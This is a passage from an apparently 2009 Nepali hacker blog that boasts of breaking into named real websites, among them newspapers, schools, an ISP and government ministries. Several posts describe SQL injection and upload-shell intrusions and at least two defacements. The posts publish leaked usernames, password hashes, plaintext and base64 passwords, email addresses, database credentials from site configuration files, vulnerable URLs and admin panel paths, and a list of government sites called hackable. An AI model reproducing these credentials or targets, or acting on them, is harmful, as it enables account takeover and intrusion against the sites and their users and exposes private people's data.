href="http://2.bp.blogspot.com/_RVRW0sa79Nw/Sx9Yg5Ape9I/AAAAAAAAACE/eVaoEPO6RP4/s1600-h/meroIT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_RVRW0sa79Nw/Sx9Yg5Ape9I/AAAAAAAAACE/eVaoEPO6RP4/s320/meroIT.png" /></a><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">So if you are the webadmin of meroit.com you can find the article at http://www.sampctricks.blogspot.com to secure your PHP scripts...<br /></div><div class="separator" style="clear: both; text-align: left;">Thanks...<br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-6893144109156641270?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com3tag:blogger.com,1999:blog-3339723251203762129.post-45726539305556184772009-12-07T11:17:00.000-08:002009-12-07T11:31:46.163-08:00www.pea.edu.np simple JS hackOk this was given to me as a challenge by sam and he said that he was given information about this site by some friend of him. He said me about javascript hacking in admin panel and I started to dig up. And finally I found that it didn't require any login(even the login user/pass is easy one: admin/a). I then found that the upload feature was also insecure. I got the shell and I could have utilized to root the box but I didn't. I just thought to make defacement of pea.edu.np.<br /><br />Some PHP dumps:<br /><br />addnew.php:<br /><br />//clearly reflects their poor coding way...<br /><?<br /> $path = "../";<br /> //$thePage = "home";<br /> include $path."includes/adminhead.php";<br /> include $path."includes/headeradmin.php";<br /> if($_POST['ok'])<br />{ <br /><br />$date1=$_POST['Date1'];<br />$title=$_POST['Title'];<br /> <br />$newfile=returnfilename($_FILES['fileattach'],"downloads");<br /><br />$sqlquery= "INSERT INTO downloads VALUES('','$date1','$title','$newfile')";<br />$rt1=mysql_query($sqlquery) or die(mysql_error());<br /> <br /> if($rt1)<br /> { <br /> print "<script>document.location='download.php';</script>";<br /> <br /> }<br /><br /><br />}<br />?><br /><br />settings.php:<br /><?<br /><br />// Online<br />/**/<br />$hostname="localhost";<br />$username="peaedu_peaedu";<br />$password="delta2009";<br />$db="peaedu_peadb";<br /><br /><br />/* LOCAL *<br /><br />$hostname="localhost";<br />$username="root";<br />$password="";<br />$db="pea_db";<br />*/<br />$connectme=mysql_connect($hostname,$username,$password);<br />?><br /><br /><br />Now the screenshot of the defaced site:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_R7J4rokcecI/Sx1Wo7PyriI/AAAAAAAAAAs/3aDzeY8V3eA/s1600-h/defaced.jpg"><img style="cursor: pointer; width: 320px; height: 124px;" src="http://1.bp.blogspot.com/_R7J4rokcecI/Sx1Wo7PyriI/AAAAAAAAAAs/3aDzeY8V3eA/s320/defaced.jpg" alt="" id="BLOGGER_PHOTO_ID_5412577588267888162" border="0" /></a><br /><br />Thanks for reading this... and to site developers, learn fucking sense of security...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4572653930555618477?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com2tag:blogger.com,1999:blog-3339723251203762129.post-54637700936355684812009-12-07T09:57:00.001-08:002009-12-07T10:00:16.021-08:00myktm.com SQLi vulnerabilityVuln: SQLi<br />Serious label: 3/5 (as user/pass can be stolen)<br />Actually, this hack was reported to us by someone anonymous. We don't have any information about him/her but thanks and full credit goes to you. Anyway, I think many of you have heard about myKtm.com, their skiddish forum and their Nepal messenger. Though I appreciate their effort in creating first Nepali IRC server/channel (I think they are the first), they need to learn about security. They talk in the leet way but they are insecured and since there are thousands of users registered over there, password compromise can be easily done.<br /><br />[+] Exploit: SQLi<br />[+] The script doesn't validate the user input which can be used to do SQL injections and steal the important data from the system.<br /><br />Samples [might have been changed since then]:<br /><br />username: hash: email<br /><br /><span style="font-weight: bold;">admin:b09048fc8f1a2ac608012c327c60f973:admin@nepalexpo.com</span><br /><span style="font-weight: bold;">huribatas:2f1157cdad63b7035e5252880bf6f9cc:huribatas111@hotmail.com</span><br /><span style="font-weight: bold;">LSD:9ae90ad18eb0e8cfde193df7d258c09b:Lsd@myktm.com [admin of myKtm]</span><br /><span style="font-weight: bold;">uTosTan:e7aebaae36f8ba319d46a7142218ef1e:utostan@gmail.com [super admin of myKtm, not sure though]</span><br /><br />Ok that was enough to disclose them. I hope they take it positively. I want them to secure themselves. Drop a comment if you are myKtm-er and I will be replying on how to secure it...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-5463770093635568481?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com4tag:blogger.com,1999:blog-3339723251203762129.post-27740627222821311252009-12-05T10:26:00.000-08:002009-12-19T07:08:48.771-08:00www.myrepublica.com multiple SQLi and XSS vulnerabilitiesMyrepublica is one of the newer magazines and the site http://www.myrepublica.com is their online site. They usually do news update and hence the site provides recent news and happenings easily to the website visitors... But, again they are not secured and suffer from normal SQLi injection vulnerabilities.<br />Here are some dumps from the table <span style="font-weight: bold;">users</span>.<br />Username: password: emailid<br /><br />ameet:1dhakal2:ameet@myrepublica.com<br />bikash:bik31@:bikash@myrepublica.com<br />prem:1khanal2:prem@myrepublica.com<br />premdhakal:dhakal123:premdhakal@myrepublica.com<br />pawan:terobaumerobau:pawan148@yahoo.com<br /><br />etc...<br /><br />Sample screenshot:<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_R7J4rokcecI/SxqoyHpJQCI/AAAAAAAAAAk/fsWQoWWIodQ/s1600-h/myrepublica.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 247px;" src="http://2.bp.blogspot.com/_R7J4rokcecI/SxqoyHpJQCI/AAAAAAAAAAk/fsWQoWWIodQ/s320/myrepublica.jpg" alt="" id="BLOGGER_PHOTO_ID_5411823481237618722" border="0" /></a><br /><br />Some fucking notes to them:<br />1) Don't fucking keep plain passes in DB<br />2) Don't fucking make re-use of the same password<br />3) Read sam207's article on securing this vulnerability...<br />4) You're giving us the location of admin panels. fuck you... learn the sense of security.<br /><br />Sorry but you are so lame that I had to deface you. No offense to myrepublica team(actually I like your newspaper), this message is to the developers of the site....<br />EDIT: I also found the site search system to be vulnerable to cross site scripting vulnerability.<br />Thank you!!!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2774062722282131125?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-10245977182719919402009-12-01T19:08:00.000-08:002009-12-01T19:50:31.426-08:00www.thehimalayantimes.com SQLi vulnerabilityThe himalayan times is one of the national daily newspapers from nepal and its site www.thehimalayantimes.com like other common nepali websites is also vulnerable to normal web hack. Its again lame SQL injection caused due to the poor coding level. I am having eye pain right now because of welding so I won't be posting much but anyway below is the SQLi hack...<br />the admin information can be stolen from admin table while tbl_member consists of registered user information so this may lead to secret private data stealing....<br />admin table consists of columns:<br />admin_user<br />admin_pass<br />admin_email<br />admin_fullname, etc.<br /><br />So SQL query: SELECT * FROM admin<br />is going to give us everything on table admin...<br />And they are also using base64 encoding. I have said previously too that a single call to base64_decode() in PHP or using online base64 decoders (www.yellowpipe.com has one) we are gonna get the actual pass easily.<br />Some dumps:<br /><b>user:pass:email for admin</b><br /><br />sajy.j:Z0kzdDRQOXM=:sajyjacob@yahoo.com<br />bipul:YmlwdWxzMQ==:bipulendra.adhikari@gmail.com<br />ARUN:c2lsaWNh:monsterdom@gmail.com<br />etc.<br />You can try and get the dumps yourself; no more dumps.<br />Read the article I have written in my blog sampctricks.blogspot.com <a href="http://sampctricks.blogspot.com/2009/05/securing-php-avoid-basic-exploits-and.html">http://sampctricks.blogspot.com/2009/05/securing-php-avoid-basic-exploits-and.html</a> in order to remove these vulnerabilities. You have lots of them in your scripts.<br />Edit:<br />again it is F1 Soft work most probably and has got so many vulnerabilities. Admin panel is in a bit less used place but we can find it easily (No need to overthink and do bruteforcing for admin cp)... Also @THT admins, do not change location of admin panel rather secure your scripts...<br />Couldnot upload the screenshot because of slow net connection and my eye problem...<br /><br />Thanks... <div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1024597718271991940?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com2tag:blogger.com,1999:blog-3339723251203762129.post-7872262496146383722009-11-29T08:26:00.000-08:002009-11-29T08:26:31.493-08:00NewsOfNepal.com SQLi Vulnerabilitywww.newsofnepal.com is just pretty insecure and more pwnage could have been carried out. Thanks to Cyb3r Lord for allowing me to post the thing he found... F1 Soft is one of the top IT company in Nepal but when it comes to coding, they suck...<br />This one is another disclosure of one of the big sites from Nepal. So lets go on...<br />There are few scripts that forget to validate the inputs and we are not disclosing how the things are vulnerable because we are not for script kiddies. Using MySQL > 5 means we can extract tables and columns easily.<br />Some tables are:<br />admin<br />advertisement<br />polling_user<br />etc.<br />And some tables are:<br />admin_pass<br />admin_user<br />admin_email<br />under admin table.<br />Now on extracting pass, I saw it was base64 encoded(FUCK). Use other hashing like md5() to encrypt. You are PHP guys and you should have known base64_decode($hash) is gonna give us the pass...<br />Anyway below is the screenshot of the pwnage:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_RVRW0sa79Nw/SxKgj1kmVcI/AAAAAAAAABY/wr2G3jJ1wjE/s1600/newsofnepal.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_RVRW0sa79Nw/SxKgj1kmVcI/AAAAAAAAABY/wr2G3jJ1wjE/s320/newsofnepal.jpg" /></a><br /></div><br /><span id="goog_1259507611154"></span><span id="goog_1259507611155"></span><br />Thanks...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-787226249614638372?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com1tag:blogger.com,1999:blog-3339723251203762129.post-77451083165771254182009-11-28T09:46:00.000-08:002009-11-28T09:46:35.630-08:00MOE.GOV.NP Multiple VulnerabilityNothing much to say, www.moe.gov.np is the site of ministry of education which was rebuilt few months ago. But the site consists of multiple security breaches that can be used to own it.<br />So what are the vulnerabilities:<br />First, SQLi, second Insecure admin panel and third insecure session handling.<br />FuCK YoU to the developer for fucking insecure programming.<br />Now let me do some dumps:<br /><br />File: clientConfigure.php<br />............<br />define("HOST","localhost");<br />define("USERNAME","moegov_moe");<br />define("PASSWORD","moepwd");<br />define("DBASE","moegov_moe");<br />............<br />............<br /><br />File: cms.php<br />.........<br />switch($_GET["task"])<br />{<br />case "":<br />$query = "SELECT * FROM cms where publish='Y' and menuId=".$_GET["id"]; // sql<br />$sql = mysql_query($query);<br />//wtf? query without sanitizing GET variable, fuck...<br />..............<br />............<br />$query = "SELECT * FROM cms where publish='Y' and cmsId=".$_GET["contId"]; // sql<br />$rs=mysql_query($query) or die(mysql_error());<br />//again same fuck<br /><br />File: index.php<br />Vuln to SQLi but good practice for file inclusions.<br /><br />..........<br />......<br />switch($_GET["option"])<br />{<br />case "":<br />require_once("./clientIncludes/tabContent.php");<br />break;<br />case "download":<br />require_once("./option/download/download.php");<br />break;<br />...........<br />.....<br /><br />File: admin/centreContent.php<br />// where is login session...<br /><?php<br />switch($_GET["option"]){<br />case "menu":<br />require_once("./option/menu/menu.php");<br />break;<br />case "user":<br />require_once("./option/user/user.php");<br />break;<br />......<br />...<br />?><br /><br />File: cpanel.config<br /><br />#### NOTICE ####<br /># After manually editing any configuration settings in this file,<br /># please run '/usr/local/cpanel/whostmgr/bin/whostmgr2 --updatetweaksettings'<br /># to fully update your server's configuration.<br /><br />RS=x3<br />VALIASDIR=/etc/valiases<br />VFILTERDIR=/etc/vfilters<br />access_log=/usr/local/cpanel/logs/access_log<br />adminuser=cpanel<br />allow_server_info_status_from=<br />allowcpsslinstall=1<br />allowparkhostnamedomainsubdomains=0<br />allowparkonothers=0<br />allowperlupdates=0<br />allowremotedomains=0<br />allowresellershostnamedomainsubdomains=0<br />allowunregistereddomains=0<br />alwaysredirecttossl=0<br />apache_port=0.0.0.0:80<br />apache_ssl_port=0.0.0.0:443<br />autocreateaentries=1<br />awstatsbrowserupdate=0<br />awstatsreversedns=0<br />basename=cpanel<br />blockcommondomains=1<br />check_zone_syntax=1<br />conserve_memory=0<br />coredump=0<br />cpaddons_adminemail=<br />cpaddons_autoupdate=1<br />cpaddons_max_moderation_req_all_mod=99<br />cpaddons_max_moderation_req_per_mod=99<br />cpaddons_moderation_request=0<br />cpaddons_no_3rd_party=0<br />cpaddons_no_modified_cpanel=1<br />cpaddons_notify_owner=1<br />cpaddons_notify_root=1<br />cpredirect=Origin Domain Name<br />cpredirectssl=SSL Certificate Name<br />cpsrvd-domainlookup=0<br />cpsrvd-gzip=1<br />cycle=1<br />default_login_theme=cpanel<br />defaultmailaction=localuser<br />deny_quicksupport_password=0<br />disable_compiled_dnsadmin=0<br />disableipnscheck=0<br />disablequotacache=0<br />disablexfercpanel=0<br />discardformmailbccsubject=1<br />dnsadminapp=<br />dnslookuponconnect=0<br />docroot=/usr/local/cpanel/base<br />domainowner_mail_pass=0<br />dumplogs=1<br />emailpasswords=1<br />emailusers_diskusage_critical_contact_admin=1<br />emailusers_diskusage_critical_percent=90<br />emailusers_diskusage_full_contact_admin=1<br />emailusers_diskusage_full_percent=98<br />emailusers_diskusage_warn_contact_admin=1<br />emailusers_diskusage_warn_percent=80<br />emailusers_mailbox_critical_percent=90<br />emailusers_mailbox_full_percent=98<br />emailusers_mailbox_warn_percent=80<br />emailusersbandwidthexceed=1<br />emailusersbandwidthexceed70=0<br />emailusersbandwidthexceed75=0<br />emailusersbandwidthexceed80=1<br />emailusersbandwidthexceed85=0<br />emailusersbandwidthexceed90=0<br />emailusersbandwidthexceed95=1<br />emailusersbandwidthexceed97=0<br />emailusersbandwidthexceed98=0<br />emailusersbandwidthexceed99=0<br />engine=cpanel<br />enginepl=cpanel.pl<br />engineroot=/usr/local/cpanel<br />errorstostdout=1<br />exim-retrytime=60<br />eximmailtrap=1<br />extracpus=0<br />file_upload_max_bytes=unlimited<br />file_upload_must_leave_bytes=5<br />ftppasslogs=1<br />ftpserver=pure-ftpd<br />htaccess_check_recurse=2<br />ignoredepreciated=0<br />interchangever=disable<br />jaildefaultshell=0<br />keepftplogs=0<br />keeplogs=0<br />keepstatslog=0<br />loadthreshold=2<br />local_nameserver_type=bind<br />logchmod=0640<br />logout_redirect_url=<br />maildir=1<br />mailserver=courier<br />maxemailsperhour=0<br />maxmem=256<br />myname=cpaneld<br />mysql-version=5.0<br />mysqldebug=0<br />nativessl=1<br />nobodyspam=0<br />nosendlangupdates=0<br />nouserbackupwarn=0<br />numacctlist=50<br />php_max_execution_time=90<br />php_post_max_size=55M<br />php_register_globals=0<br />php_upload_max_filesize=50M<br />phploader=none<br />popbeforesmtpsenders=0<br />port=2082<br />product=cPanel<br />proxysubdomains=1<br />proxysubdomainsfornewaccounts=1<br />proxysubdomainsoverride=1<br />publichtmlsubsonly=0<br />python=/usr/bin/python2.4<br />referrerblanksafety=0<br />referrersafety=0<br />remotedomainscheck=1<br />remotewhmtimeout=35<br />resetpass=1<br />rollback=0<br />root=/usr/local/cpanel<br />showwhmbwusageinmegs=0<br />skipanalog=1<br />skipawstats=0<br />skipboxcheck=0<br />skipboxtrapper=0<br />skipbwlimitcheck=0<br />skipdiskcheck=0<br />skipformmail=1<br />skiphorde=0<br />skiphttpauth=0<br />skipmailman=0<br />skipmelange=1<br />skipnotifyacctbackupfailure=0<br />skipparentcheck=0<br />skiproundcube=0<br />skipspamassassin=0<br />skipspambox=0<br />skipsqmail=0<br />skipwebalizer=1<br />skipwhoisns=0<br />stats_log=/usr/local/cpanel/logs/stats_log<br />statsloglevel=1<br />statthreshhold=256<br />stunnel=/usr/sbin/stunnel<br />tcp_check_failure_threshold=3<br />urchinsetpath=<br />use_safe_quotas=1<br />useauthnameservers=0<br />usemailformailmanurl=1<br />usemysqloldpass=0<br />version=8.0<br /><br /><br />Feeling boring after the pwnage. Need to do mathematics assignment. That was the pwnage of moe.gov.np<br />They are pretty insecure. The method not disclosed over here but good hackers can find it. Sorry, script kiddies...<br />Thanks...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-7745108316577125418?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com5tag:blogger.com,1999:blog-3339723251203762129.post-12504072223215902102009-11-14T02:14:00.000-08:002009-11-14T02:20:24.088-08:00KhullaBazaar.com Shopping Site SQL Vulnerability<span style="font-weight: bold;">Site</span>: www.khullabazaar.com<br /><span style="font-weight: bold;">Risk</span>: High [Critical informations can be stolen]<br /><span style="font-weight: bold;">Notified</span>: YES [in a way]<br />/*Action from Admin: N/A*/<br /><span style="font-weight: bold;">Vulnerable file</span>: You should figure it out easily<br /><span style="font-weight: bold;">Exploit</span>: The php script do not validate the inputs from user which can be used to compromise the database.<br /><span style="font-weight: bold;">Solution</span>: sam207 has written an article on it.<br /><br />If any of the site admin is viewing this page, you can contact me or sam to know what's vulnerable and how to fix it. Don't take the pwnage negatively...<br />Thanks.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1250407222321590210?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com5tag:blogger.com,1999:blog-3339723251203762129.post-86283395499252268772009-11-09T20:29:00.000-08:002009-11-09T20:29:41.179-08:00DC-nepal.com Multiple VulnerabilitiesI got the link to the site from some nepali social networking site and was just testing the security issues of the site as the <b>about us</b> page stated that the people of DC-nepal are quite good in computer technology. I started with general web hacks and unfortunately found this site to be vulnerable to SQL injection and persistent cross site scripting. So I thought to share this with you guys.<br />SQLi:<br />http://www.dc-nepal.com/nepali_model.php?id=437<br />The id variable is not well sanitized so valid queries can be injected to the site. Since the MySQL version>5, its even more easier for hackers to get different credentials from the site.<br />Some tables:<br />admin<br />dc_classicfied<br /><br />Login user/hash: laxman: hnz/uP1502jYsjqs//hCfg==<br />You need to decrypt the password and you can login from /admin.<br /><br /><br />Persistent XSS:<br />http://www.dc-nepal.com/nepali_model.php?id=437<br />The comment form doesn't filter any malicious so this can be used to drop executables and redirects.<br />Hope they make a quick fix. They were notified...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-8628339549925226877?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-54989573936196584032009-10-31T22:05:00.001-07:002009-10-31T22:05:59.079-07:00Venus.com.np Security DisclosureVenus.com.np Hackz:<br /><br /><br /><br />Last 4 lines of .htaccess:<br /><br />AuthType Basic<br /><br />AuthName www.venus.com.np<br /><br />AuthUserFile /home/venus/public_html/_vti_pvt/service.pwd<br /><br />AuthGroupFile /home/venus/public_html/_vti_pvt/service.grp<br /><br /><br /><br /><br /><br />Example of poor coding:<br /><br /><?php<br /><br />$inc = $_GET['page'] . '.php';<br /><br />if ($inc == '.php') $inc = 'home.php';<br /><br />//echo $inc;<br /><br />?><br /><br /><br />Nothing more to say. You know how vulnerable they are. Happy Hacking!!! :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-5498957393619658403?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com3tag:blogger.com,1999:blog-3339723251203762129.post-51856872820833101442009-10-31T22:00:00.001-07:002009-10-31T22:00:40.896-07:00placementNepal.com Security DisclosureI hate placementnepal.com and its parent hitechacademy. They say they have the best coder but their coders suck. Owning placementNepal.com was not a big deal as they don't know what security is and hence, can't secure themselves.<br /><br /><br /><br />Interesting tables in the database of placementNepal:<br /><br />clients<br /><br />cusers<br /><br />privileges<br /><br />recruitusers<br /><br />userprivileges<br /><br />users<br /><br />uusers<br /><br /><br /><br />And they don't put your passwords encrypted in their database. So don't reuse your email accounts and other passwords in placementNepal.com.<br /><br />Some sample login examples:<br /><br />Email: Password<br /><br />amrit_giri@hotmail.com: rrihchaa<br /><br />rikesh_eikir@hotmail.com: haratimaan07<br /><br />merhythm@hotmail.com: 24*365sweta<br /><br /><br /><br />No more disclosure. Sorry to those whose emails were selected randomly...<br /><br />Thank you and Happy Hacking... :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-5185687282083310144?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-13960898326330756052009-10-31T21:55:00.001-07:002009-10-31T21:56:51.709-07:00Nepal telecom phpinfo() disclosureCyb3r Lord had previously posted the hacks that can be used to exploit NTC website. He also talked about php info in NTC site. However, he didn't share the contents of php info of NTC. So I thought to share it with you guys.<br /><br /><br /><br />Code:<br /><br /><?php<br /><br />phpinfo();<br /><br />?><br /><br /><br /><br />Some parts from it:<br /><br /><br /><br />System Linux bhadrakali.ntc.net.np 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686<br /><br />Build Date Jul 16 2008 19:54:37<br /><br />Server API Apache 2.0 Handler <br /><br />PHP.INI path /etc/php.ini<br /><br />allow_url_fopen On On<br /><br />expose_php On On<br /><br />magic_quotes_gpc On On<br /><br />magic_quotes_runtime Off Off<br /><br />register_globals On On<br /><br />safe_mode Off Off<br /><br />SMTP seti.ntc.net.np seti.ntc.net.np<br /><br /><br /><br />Why the hell are they keeping register_globals on; sucks... And why would they like to turn on allow_url_fopen. Learn some security. Other critical informations not disclosed over here.<br /><br />Thanks<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1396089832633075605?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com2tag:blogger.com,1999:blog-3339723251203762129.post-84046906599523354702009-10-31T21:53:00.000-07:002009-10-31T21:53:25.362-07:00Hitechacademy Security DisclosureHi there,<br /><br />in this post, I am going to disclose the security issues of hitech academy which gives computer training to many students. Though it says its one of the best from Nepal, it knows nothing about security. So I thought to disclose them...<br /><br /><br /><br />Learn some coding Hitech guys, the manager had told me in my interview that he has got some best paid programmers from Nepal and you(means I) can't compete with them, so sorry for this time.<br /><br /><br /><br />From index.php:<br /><br />if(isset($_GET['action']))<br /><br /> {<br /><br /> include("includes/".$_GET['action'].".php"); <br /><br /> }<br /><br /> <br /><br />WTF? Don't you know how to validate variables. Sucks... Poor coding.<br /><br /><br /><br />From DBConnection file:<br /><br /><?php<br /><br /><br /><br />$dbuser="hitechac_hitech";<br /><br />$dbpassword="hitech";<br /><br />$database="hitechac_hitech";<br /><br /><br /><br />$host = "localhost";<br /><br /><br /><br /><br /><br />$ado=new data($host,$dbuser,$dbpassword,$database);<br /><br />?><br /><br /><br /><br />From one of the functions file:<br /><br />function adminLogin($username, $password)<br /><br /> {<br /><br /> global $ado;<br /><br /> global $userGroups;<br /><br /> <br /><br /> $sql = "SELECT u.* FROM users u, usergroups ug WHERE u.username = '$username' AND u.password = '$password'<br /><br /> AND u.userGroupId = ug.id AND ug.name = 'admin'";<br /><br /> $result = $ado->exec($sql);<br /><br /> <br /><br /> if ($ado->count_row($result) > 0)<br /><br /> {<br /><br /> //login successful<br /><br /> <br /><br /> $row = $ado->fetch_array($result);<br /><br /> <br /><br /> $_SESSION['userId'] = $row['id'];<br /><br /> $_SESSION['userFullname'] = $row['fullname'];<br /><br /> $_SESSION['userUsername'] = $row['username'];<br /><br /> $_SESSION['userGroupId'] = $row['userGroupId'];<br /><br /> <br /><br /> $gResult = $userGroups->getById($row['userGroupId']);<br /><br /> $gRow = $ado->fetch_array($gResult);<br /><br /> <br /><br /> $_SESSION['userGroupPower'] = $gRow['power'];<br /><br /> $_SESSION['userGroupName'] = $gRow['name'];<br /><br /> <br /><br /> return true;<br /><br /> }<br /><br /> //invalid login<br /><br /> return false;<br /><br /> }<br /><br /> <br /><br />WTF? Don't you know SQLi vuln is very bad.<br /><br /><br /><br />Hitech email login PHP script snippet:<br /><br /><br /><br /><?<br /><br />session_start();<br /><br />if (isset($_POST['Submit']))<br /><br />{<br /><br /> if ($_POST['username'] == "hitechemail" && $_POST['password'] == "emailhitech")<br /><br /> {<br /><br /> $_SESSION['userId'] = "hitech";<br /><br /> header("Location: index.php");<br /><br /> exit();<br /><br /> }<br /><br />}<br /><br />?><br /><br /><br />LOL... passes in normal form. Learn to use md5(), hitech.<br /><br /><br /><br />To Hitech Academy, please make corrections in the following informations from your site(Do not hide the truth from your clients; just say how lame you are...):<br /><br /><br /><br />HiTech Academy is an institution established with the aim of providing (non-)quality education and training in the field of Basic (and Advance; remove this) Computing, Computer Accounting, Hardware and Networking, (Add insecure) Computer Programming, Web Designing, Tele-communications, English Language and Personality Development and a host of other allied subjects. It also provides job placement services to its students as well as other job seekers.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-8404690659952335470?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-18492215678525713122009-10-31T21:50:00.001-07:002009-10-31T21:54:26.081-07:00HimalTech [ISP] Security DisclosureThis is a minor one(at least I think). Himaltech is a ISP from Nepal (though I had never heard it). First think, don't host on Windows system; use free and open source Linux distro... They are cheaper, I think.<br /><br /><br /><br />From index.php(exploitable snippet):<br /><br />if(($p == "") && ($q != "")){<br /><br />$filename = $q;<br /><br />} elseif($p != ""){<br /><br />$filename = $p."/content";<br /><br />} else {<br /><br />$filename = "home";<br /><br />}<br /><br />include($filename.$ext);<br /><br /><br /><br />WTF? How are you making includes. Fucking noobish.<br /><br /><br /><br />From one of the PHP scripts:<br /><br /><br /><br />$query = "UPDATE newsFeed set date='". $_POST['dated'] ."' WHERE id='". $_POST['id'] ."'";<br /><br /><br /><br />Oh hell. learn to validate the inputs. What would have happened if an evil user had submitted some malformed information.<br /><br /><br /><br />Some configs from the functions.php:<br /><br /><br /><br /><?php<br /><br /><br /><br />$isp[lname] = "HimalTech Internet Services";<br /><br />$isp[sname] = "HimalTech";<br /><br />$isp[sup_tel] = "443-9541, 01-621-8615";<br /><br />$isp[gen_tel] = "+977 (1) 44 39 541";<br /><br />$isp[sup_email] = "support@himaltech.com";<br /><br />$isp[gen_email] = "info@himaltech.com";<br /><br /><br /><br /><br /><br />$radHost = "himaltech.com";<br /><br />$radUser = "phpmgmt";<br /><br />$radPass = "**EDITED**";<br /><br />$radName = "radius";<br /><br /><br /><br />$newsHost = localhost;<br /><br />$newsUser = "himal";<br /><br />$newsPass = "**EDITED**";<br /><br />$newsName = "ht";<br /><br />............<br /><br />...........<br /><br />?><br /><br /><br />And some arrays:<br /><br /><br /><br />$nas = array(<br /><br />"69.88.8.94" => array("port" => 30, "name" => "Dhau"),<br /><br />"10.0.0.3" => array("port" => 30, "name" => "vold_dhau"),<br /><br />"202.161.146.197" => array("port" => 30, "name" => "old_dhau"),<br /><br />"202.161.146.209" => array("port" => 30, "name" => "dhauold")<br /><br />);<br /><br /><br /><br />So that was the show on himaltech. Happy hacking!!! :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1849221567852571312?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-46334945868522182152009-10-31T21:48:00.000-07:002009-10-31T21:48:57.875-07:00Government sites SQLi vulnerabilities series IMost of the Nepali government sites are not updated and also are pretty insecure. So here I have thought to list some of the hackable government sites.<br /><br />Risk: Various<br /><br />Dork: WTF? Figure yourself...<br /><br /><br /><br />http://www.Can.gov.np:<br /><br />Path: /web/vhosts/can.gov.np/httpdocs/<br /><br />Vuln: SQLi<br /><br /><br /><br />http://www.ccwb.gov.np<br /><br />Vuln: SQLi<br /><br /><br /><br />http://www.dfrs.gov.np:<br /><br />Vuln: SQLi<br /><br />Admin panel: http://www.dfrs.gov.np/admin/login.php<br /><br /><br /><br />http://www.dhm.gov.np:<br /><br />Vuln: SQLi<br /><br />Admin panel: /dhmadmin<br /><br /><br /><br />http://www.dvsdt.gov.np:<br /><br />Vuln: SQLi<br /><br /><br /><br />http://www.kathmandu.gov.np:<br /><br />Vuln: SQLi<br /><br /><br /><br />http://www.mofsc.gov.np:<br /><br />Vuln: SQLi<br /><br /><br /><br />http://www.moi.gov.np:<br /><br />Vuln: SQLi<br /><br /><br /><br />http://www.npc.gov.np:<br /><br />Vuln: SQLi<br /><br /><br /><br />http://tourismnepal.gov.np:<br /><br />Vuln: SQLi<br /><br /><br /><br />http://www.moe.gov.np<br /><br />Vuln: SQLi<br /><br /><br /><br />There are more vulnerable sites... These were just the examples... They are vulnerable to the most common exploit (SQL injection) which can be even done by fucking 